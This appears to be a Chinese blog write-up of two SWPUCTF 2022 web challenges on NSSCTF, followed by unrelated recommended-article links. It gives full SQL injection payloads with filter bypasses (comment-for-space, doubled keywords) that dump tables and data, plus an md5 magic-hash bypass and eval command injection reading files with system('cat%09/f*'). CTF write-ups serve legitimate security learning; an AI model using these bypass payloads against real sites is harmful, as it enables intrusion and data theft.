NSSCTF做题(10)

叫10好听一点,就是补9的 第7页的内容

[SWPUCTF 2022 新生赛]ez_sql

get传参说是不安全,那就只能用post了

有回显了,两个假的flag

发现万能密码 1' or 1=1#变成了 1=1# 1=1# 1 1=1#=1# 1=1# 1=1#

发现or和空格都无了,union也过滤

空格可以用/**/来代替,union可以双写绕过

知道了大概的过滤,就直接开注

nss=2'/**/ununionion/**/select/**/1,2,3;#

成功绕过,回显位 2,3

查库:nss=2'/**/ununionion/**/select/**/1,database(),3;#

查表:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

查字段:nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

查数据:nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;# 得到flag

[SWPUCTF 2022 新生赛]webdog1__start

f12看源码 源代码里边的

复制代码
<!--
if (isset($_GET['web']))
{
    $first=$_GET['web'];
    if ($first==md5($first)) 
     
-->

传参,md5值相等,试着用数组绕过结果不行,那就用科学计数法

?web=0e215962017

还是查看源代码,得到robots.txt提示,访问得到一堆乱码,还有一个fl4g.php

不说了直接访问

源代码里也没什么东西,抓个包看看,发现有提示

访问一下F1l1l1l1l1lag.php,代码审计

  1. isset($_GET['get'])检查是否存在名为的GET参数。

  2. 如果参数存在,将其赋值给变量。

  3. strstr($get, " ")检查中是否包含空格。

  4. 如果中不包含空格,使用函数将中的所有"flag"替换为空格。这可能是为了防止对flag进行直接访问。

  5. 如果的长度大于18个字符,输出"This is too long."并终止脚本的执行。

  6. 如果的长度小于等于18个字符,使用函数执行中的内容。函数可以执行字符串形式的PHP代码。

  7. 如果中包含空格,输出"nonono"并终止脚本的执行

可以看到有eval函数,命令执行没得跑了 输入命令?get=system('ls');

看到了flag.php 尝试访问,绕过空格的方法,绕过flag就可以用通配符/f*来绕过

得到flag ?get=system('cat%09/f*');

相关推荐
小马爱打代码2 小时前
Spring Boot:模块化实战 - 保持清晰架构
java·spring boot·架构
岁忧2 小时前
GoLang五种字符串拼接方式详解
开发语言·爬虫·golang
tyatyatya2 小时前
MATLAB基础数据类型教程:数值型/字符型/逻辑型/结构体/元胞数组全解析
开发语言·matlab
小坏讲微服务3 小时前
SpringBoot4.0整合knife4j 在线文档完整使用
java·spring cloud·在线文档·knife4j·文档·接口文档·swagger-ui
8***Z893 小时前
springboot 异步操作
java·spring boot·mybatis
i***13243 小时前
Spring BOOT 启动参数
java·spring boot·后端
坚持不懈的大白3 小时前
后端:SpringMVC
java
IT_Octopus3 小时前
(旧)Spring Securit 实现JWT token认证(多平台登录&部分鉴权)
java·后端·spring
kk哥88993 小时前
Spring详解
java·后端·spring
S***26753 小时前
Spring Cloud Gateway 整合Spring Security
java·后端·spring